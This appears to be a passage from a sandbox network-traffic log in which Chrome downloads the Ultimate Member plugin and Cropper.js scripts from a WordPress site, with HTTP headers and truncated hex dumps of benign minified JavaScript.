                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        73192.168.2.449832141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC586OUTGET /wp-content/plugins/ultimate-member/assets/js/common-frontend.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-6e4"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147811
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f62d4d43bc-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC878INData Raw: 36 65 34 0d 0a 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 55 4d 26 26 28 77 69 6e 64 6f 77 2e 55 4d 3d 7b 7d 29 2c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 55 4d 2e 66 72 6f 6e 74 65 6e 64 26 26 28 55 4d 2e 66 72 6f 6e 74 65 6e 64 3d 7b 7d 29 2c 55 4d 2e 66 72 6f 6e 74 65 6e 64 3d 7b 63 72 6f 70 70 65 72 3a 7b 6f 62 6a 3a 6e 75 6c 6c 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6a 51 75 65 72 79 28 22 2e 75 6d 2d 6d 6f 64 61 6c 20 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 20 69 6d 67 22 29 2e 66 69 72 73 74 28 29 3b 69 66 28 6f 2e 6c 65 6e 67 74 68 26 26 22 22 21 3d 3d 6f 2e 61 74 74 72 28 22 73 72 63 22 29 29 7b 55 4d 2e 66 72 6f 6e 74 65 6e 64 2e 63 72 6f 70 70
                                                                                                                                                                                                                                                                        Data Ascii: 6e4"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.frontend&&(UM.frontend={}),UM.frontend={cropper:{obj:null,init:function(){var o=jQuery(".um-modal .um-single-image-preview img").first();if(o.length&&""!==o.attr("src")){UM.frontend.cropp
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC893INData Raw: 78 2d 68 65 69 67 68 74 22 3a 64 2b 22 70 78 22 7d 29 29 3b 6c 65 74 20 65 3b 22 73 71 75 61 72 65 22 3d 3d 3d 72 3f 65 3d 7b 6d 69 6e 57 69 64 74 68 3a 6e 2c 6d 69 6e 48 65 69 67 68 74 3a 69 2c 64 72 61 67 43 72 6f 70 3a 21 31 2c 61 73 70 65 63 74 52 61 74 69 6f 3a 31 2c 7a 6f 6f 6d 61 62 6c 65 3a 21 31 2c 72 6f 74 61 74 61 62 6c 65 3a 21 31 2c 64 61 73 68 65 64 3a 21 31 7d 3a 22 63 6f 76 65 72 22 3d 3d 3d 72 3f 28 30 3c 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 2f 61 29 26 26 28 69 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 6e 2f 61 29 29 2c 65 3d 7b 6d 69 6e 57 69 64 74 68 3a 6e 2c 6d 69 6e 48 65 69 67 68 74 3a 69 2c 64 72 61 67 43 72 6f 70 3a 21 31 2c 61 73 70 65 63 74 52 61 74 69 6f 3a 61 2c 7a 6f 6f 6d 61 62 6c 65 3a 21 31 2c 72 6f 74 61 74 61 62 6c 65 3a 21 31
                                                                                                                                                                                                                                                                        Data Ascii: x-height":d+"px"}));let e;"square"===r?e={minWidth:n,minHeight:i,dragCrop:!1,aspectRatio:1,zoomable:!1,rotatable:!1,dashed:!1}:"cover"===r?(0<Math.round(n/a)&&(i=Math.round(n/a)),e={minWidth:n,minHeight:i,dragCrop:!1,aspectRatio:a,zoomable:!1,rotatable:!1
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        74192.168.2.449830141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:53 UTC588OUTGET /wp-content/plugins/ultimate-member/assets/libs/cropper/cropper.min.js?ver=1.6.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-9204"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147811
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f62a86c35e-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 21 0a 20 2a 20 43 72 6f 70 70 65 72 2e 6a 73 20 76 31 2e 36 2e 31 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 66 65 6e 67 79 75 61 6e 63 68 65 6e 2e 67 69 74 68 75 62 2e 69 6f 2f 63 72 6f 70 70 65 72 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 35 2d 70 72 65 73 65 6e 74 20 43 68 65 6e 20 46 65 6e 67 79 75 61 6e 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 44 61 74 65 3a 20 32 30 32 33 2d 30 39 2d 31 37 54 30 33 3a 34 34 3a 31 39 2e 38 36 30 5a 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d
                                                                                                                                                                                                                                                                        Data Ascii: 7dc5/*! * Cropper.js v1.6.1 * https://fengyuanchen.github.io/cropperjs * * Copyright 2015-present Chen Fengyuan * Released under the MIT license * * Date: 2023-09-17T03:44:19.860Z */!function(t,e){"object"==typeof exports&&"undefined"!=typeof m
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 69 7d 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 61 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 43 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 44 28 74 29 7b 72 65 74 75 72 6e 28 44 3d 22 66 75 6e 63 74 69 6f 6e 22 3d
                                                                                                                                                                                                                                                                        Data Ascii: le:!0}):e[t]=i}):Object.getOwnPropertyDescriptors?Object.defineProperties(a,Object.getOwnPropertyDescriptors(n)):C(Object(n)).forEach(function(t){Object.defineProperty(a,t,Object.getOwnPropertyDescriptor(n,t))})}return a}function D(t){return(D="function"=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 50 28 74 29 7b 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 6e 75 6c 6c 3d 3d 3d 74 29 72 65 74 75 72 6e 20 74 3b 76 61 72 20 69 3d 74 5b 53 79 6d 62 6f 6c 2e 74 6f 50 72 69 6d 69 74 69 76 65 5d 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 69 29 72 65 74 75 72 6e 28 22 73 74 72 69 6e 67 22 3d 3d 3d 65 3f 53 74 72 69 6e 67 3a 4e 75 6d 62 65 72 29 28 74 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 28 69 3d 69 2e 63 61 6c 6c 28 74 2c 65 7c 7c 22 64 65 66 61 75 6c 74 22 29 29 29 72 65 74 75 72 6e 20 69 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 40 40 74 6f 50 72 69 6d 69 74 69 76 65 20 6d 75 73 74 20 72 65 74 75 72 6e 20 61 20 70 72 69 6d 69 74 69 76 65
                                                                                                                                                                                                                                                                        Data Ascii: P(t){t=function(t,e){if("object"!=typeof t||null===t)return t;var i=t[Symbol.toPrimitive];if(void 0===i)return("string"===e?String:Number)(t);if("object"!=typeof(i=i.call(t,e||"default")))return i;throw new TypeError("@@toPrimitive must return a primitive
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 63 65 6e 74 65 72 3a 21 30 2c 68 69 67 68 6c 69 67 68 74 3a 21 30 2c 62 61 63 6b 67 72 6f 75 6e 64 3a 21 30 2c 61 75 74 6f 43 72 6f 70 3a 21 30 2c 61 75 74 6f 43 72 6f 70 41 72 65 61 3a 2e 38 2c 6d 6f 76 61 62 6c 65 3a 21 30 2c 72 6f 74 61 74 61 62 6c 65 3a 21 30 2c 73 63 61 6c 61 62 6c 65 3a 21 30 2c 7a 6f 6f 6d 61 62 6c 65 3a 21 30 2c 7a 6f 6f 6d 4f 6e 54 6f 75 63 68 3a 21 30 2c 7a 6f 6f 6d 4f 6e 57 68 65 65 6c 3a 21 30 2c 77 68 65 65 6c 5a 6f 6f 6d 52 61 74 69 6f 3a 2e 31 2c 63 72 6f 70 42 6f 78 4d 6f 76 61 62 6c 65 3a 21 30 2c 63 72 6f 70 42 6f 78 52 65 73 69 7a 61 62 6c 65 3a 21 30 2c 74 6f 67 67 6c 65 44 72 61 67 4d 6f 64 65 4f 6e 44 62 6c 63 6c 69 63 6b 3a 21 30 2c 6d 69 6e 43 61 6e 76 61 73 57 69 64 74 68 3a 30 2c 6d 69 6e 43 61 6e 76 61 73 48 65
                                                                                                                                                                                                                                                                        Data Ascii: center:!0,highlight:!0,background:!0,autoCrop:!0,autoCropArea:.8,movable:!0,rotatable:!0,scalable:!0,zoomable:!0,zoomOnTouch:!0,zoomOnWheel:!0,wheelZoomRatio:.1,cropBoxMovable:!0,cropBoxResizable:!0,toggleDragModeOnDblclick:!0,minCanvasWidth:0,minCanvasHe
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 31 65 31 31 3b 72 65 74 75 72 6e 20 78 74 2e 74 65 73 74 28 74 29 3f 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2a 65 29 2f 65 3a 74 7d 76 61 72 20 4d 74 3d 2f 5e 77 69 64 74 68 7c 68 65 69 67 68 74 7c 6c 65 66 74 7c 74 6f 70 7c 6d 61 72 67 69 6e 4c 65 66 74 7c 6d 61 72 67 69 6e 54 6f 70 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 76 61 72 20 69 3d 74 2e 73 74 79 6c 65 3b 7a 28 65 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 4d 74 2e 74 65 73 74 28 65 29 26 26 70 28 74 29 26 26 28 74 3d 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 70 78 22 29 29 2c 69 5b 65 5d 3d 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 65 29 7b 76 61 72 20 69 3b 65 26 26 28 70 28 74 2e 6c 65 6e 67 74 68 29 3f 7a 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 28 74 2c 65 29 7d
                                                                                                                                                                                                                                                                        Data Ascii: 1e11;return xt.test(t)?Math.round(t*e)/e:t}var Mt=/^width|height|left|top|marginLeft|marginTop$/;function f(t,e){var i=t.style;z(e,function(t,e){Mt.test(e)&&p(t)&&(t="".concat(t,"px")),i[e]=t})}function v(t,e){var i;e&&(p(t.length)?z(t,function(t){v(t,e)}
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 6e 65 72 73 2c 69 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 6e 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 6f 2c 74 2c 68 2c 65 29 7b 76 61 72 20 72 3d 33 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 7b 7d 2c 73 3d 68 3b 74 2e 74 72 69 6d 28 29 2e 73 70 6c 69 74 28 54 74 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 74 2c 6e 3b 72 2e 6f 6e 63 65 26 26 21 45 74 26 26 28 74 3d 6f 2e 6c 69 73 74 65 6e 65 72 73 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6e 5b 61 5d 5b 68 5d 2c 6f 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 61 2c 73 2c 72 29 3b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c
                                                                                                                                                                                                                                                                        Data Ascii: ners,i.removeEventListener(t,o,n)})}function b(o,t,h,e){var r=3<arguments.length&&void 0!==e?e:{},s=h;t.trim().split(Tt).forEach(function(a){var t,n;r.once&&!Et&&(t=o.listeners,s=function(){delete n[a][h],o.removeEventListener(a,s,r);for(var t=arguments.l
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 61 74 28 69 2c 22 29 22 29 29 2c 70 28 61 29 26 26 31 21 3d 3d 61 26 26 6f 2e 70 75 73 68 28 22 73 63 61 6c 65 59 28 22 2e 63 6f 6e 63 61 74 28 61 2c 22 29 22 29 29 2c 6f 2e 6c 65 6e 67 74 68 3f 6f 2e 6a 6f 69 6e 28 22 20 22 29 3a 22 6e 6f 6e 65 22 29 3b 72 65 74 75 72 6e 7b 57 65 62 6b 69 74 54 72 61 6e 73 66 6f 72 6d 3a 6e 2c 6d 73 54 72 61 6e 73 66 6f 72 6d 3a 6e 2c 74 72 61 6e 73 66 6f 72 6d 3a 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 74 2c 65 29 7b 76 61 72 20 69 3d 74 2e 70 61 67 65 58 2c 74 3d 74 2e 70 61 67 65 59 2c 61 3d 7b 65 6e 64 58 3a 69 2c 65 6e 64 59 3a 74 7d 3b 72 65 74 75 72 6e 20 65 3f 61 3a 53 28 7b 73 74 61 72 74 58 3a 69 2c 73 74 61 72 74 59 3a 74 7d 2c 61 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 74 2c 65 29 7b 76 61 72 20 69 2c 61 3d
                                                                                                                                                                                                                                                                        Data Ascii: at(i,")")),p(a)&&1!==a&&o.push("scaleY(".concat(a,")")),o.length?o.join(" "):"none");return{WebkitTransform:n,msTransform:n,transform:n}}function M(t,e){var i=t.pageX,t=t.pageY,a={endX:i,endY:t};return e?a:S({startX:i,startY:t},a)}function R(t,e){var i,a=
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 2c 4c 29 2c 58 28 74 2c 4c 29 2c 7b 77 69 64 74 68 3a 4d 61 74 68 2e 6d 61 78 28 69 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 30 3c 3d 6e 3f 6e 3a 32 30 30 29 2c 68 65 69 67 68 74 3a 4d 61 74 68 2e 6d 61 78 28 69 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 30 3c 3d 65 3f 65 3a 31 30 30 29 7d 29 3b 66 28 61 2c 7b 77 69 64 74 68 3a 28 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 44 61 74 61 3d 6e 29 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 6e 2e 68 65 69 67 68 74 7d 29 2c 76 28 74 2c 4c 29 2c 58 28 61 2c 4c 29 7d 2c 69 6e 69 74 43 61 6e 76 61 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 63 6f 6e 74 61 69 6e 65 72 44 61 74 61 2c 65 3d 74 68 69 73 2e 69 6d 61 67 65 44 61 74 61 2c 69 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 76 69 65 77 4d
                                                                                                                                                                                                                                                                        Data Ascii: ,L),X(t,L),{width:Math.max(i.offsetWidth,0<=n?n:200),height:Math.max(i.offsetHeight,0<=e?e:100)});f(a,{width:(this.containerData=n).width,height:n.height}),v(t,L),X(a,L)},initCanvas:function(){var t=this.containerData,e=this.imageData,i=this.options.viewM
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 31 29 3c 68 3f 28 72 3d 61 2e 77 69 64 74 68 2d 6e 2e 77 69 64 74 68 2c 74 3d 61 2e 68 65 69 67 68 74 2d 6e 2e 68 65 69 67 68 74 2c 6e 2e 6d 69 6e 4c 65 66 74 3d 4d 61 74 68 2e 6d 69 6e 28 30 2c 72 29 2c 6e 2e 6d 69 6e 54 6f 70 3d 4d 61 74 68 2e 6d 69 6e 28 30 2c 74 29 2c 6e 2e 6d 61 78 4c 65 66 74 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 72 29 2c 6e 2e 6d 61 78 54 6f 70 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 74 29 2c 73 26 26 74 68 69 73 2e 6c 69 6d 69 74 65 64 26 26 28 6e 2e 6d 69 6e 4c 65 66 74 3d 4d 61 74 68 2e 6d 69 6e 28 6f 2e 6c 65 66 74 2c 6f 2e 6c 65 66 74 2b 28 6f 2e 77 69 64 74 68 2d 6e 2e 77 69 64 74 68 29 29 2c 6e 2e 6d 69 6e 54 6f 70 3d 4d 61 74 68 2e 6d 69 6e 28 6f 2e 74 6f 70 2c 6f 2e 74 6f 70 2b 28 6f 2e 68 65 69 67 68 74 2d 6e 2e 68 65 69 67 68
                                                                                                                                                                                                                                                                        Data Ascii: 1)<h?(r=a.width-n.width,t=a.height-n.height,n.minLeft=Math.min(0,r),n.minTop=Math.min(0,t),n.maxLeft=Math.max(0,r),n.maxTop=Math.max(0,t),s&&this.limited&&(n.minLeft=Math.min(o.left,o.left+(o.width-n.width)),n.minTop=Math.min(o.top,o.top+(o.height-n.heigh
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC1369INData Raw: 6d 69 74 43 61 6e 76 61 73 28 21 31 2c 21 30 29 2c 68 2e 6c 65 66 74 3d 4d 61 74 68 2e 6d 69 6e 28 4d 61 74 68 2e 6d 61 78 28 68 2e 6c 65 66 74 2c 68 2e 6d 69 6e 4c 65 66 74 29 2c 68 2e 6d 61 78 4c 65 66 74 29 2c 68 2e 74 6f 70 3d 4d 61 74 68 2e 6d 69 6e 28 4d 61 74 68 2e 6d 61 78 28 68 2e 74 6f 70 2c 68 2e 6d 69 6e 54 6f 70 29 2c 68 2e 6d 61 78 54 6f 70 29 2c 68 2e 6f 6c 64 4c 65 66 74 3d 68 2e 6c 65 66 74 2c 68 2e 6f 6c 64 54 6f 70 3d 68 2e 74 6f 70 2c 66 28 74 68 69 73 2e 63 61 6e 76 61 73 2c 67 28 7b 77 69 64 74 68 3a 68 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 68 2e 68 65 69 67 68 74 7d 2c 78 28 7b 74 72 61 6e 73 6c 61 74 65 58 3a 68 2e 6c 65 66 74 2c 74 72 61 6e 73 6c 61 74 65 59 3a 68 2e 74 6f 70 7d 29 29 29 2c 74 68 69 73 2e 72 65 6e 64 65 72 49
                                                                                                                                                                                                                                                                        Data Ascii: mitCanvas(!1,!0),h.left=Math.min(Math.max(h.left,h.minLeft),h.maxLeft),h.top=Math.min(Math.max(h.top,h.minTop),h.maxTop),h.oldLeft=h.left,h.oldTop=h.top,f(this.canvas,g({width:h.width,height:h.height},x({translateX:h.left,translateY:h.top}))),this.renderI


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        75192.168.2.449833141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC579OUTGET /wp-content/plugins/ultimate-member/assets/js/um-modal.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:54 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-101c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147811
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9f75a441906-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:54 UTC877INData Raw: 31 30 31 63 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 6d 6f 76 65 5f 4d 6f 64 61 6c 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 27 2e 75 6d 2d 6d 6f 64 61 6c 2d 6f 76 65 72 6c 61 79 2c 20 61 5b 64 61 74 61 2d 61 63 74 69 6f 6e 3d 22 75 6d 5f 72 65 6d 6f 76 65 5f 6d 6f 64 61 6c 22 5d 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 75 6d 5f 72 65 6d 6f 76 65 5f 6d 6f 64 61 6c 28 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b
                                                                                                                                                                                                                                                                        Data Ascii: 101cjQuery(document).ready(function(){jQuery(document).on("click",".um-popup-overlay",function(){remove_Modal()}),jQuery(document).on("click",'.um-modal-overlay, a[data-action="um_remove_modal"]',function(){um_remove_modal()}),jQuery(document).on("click
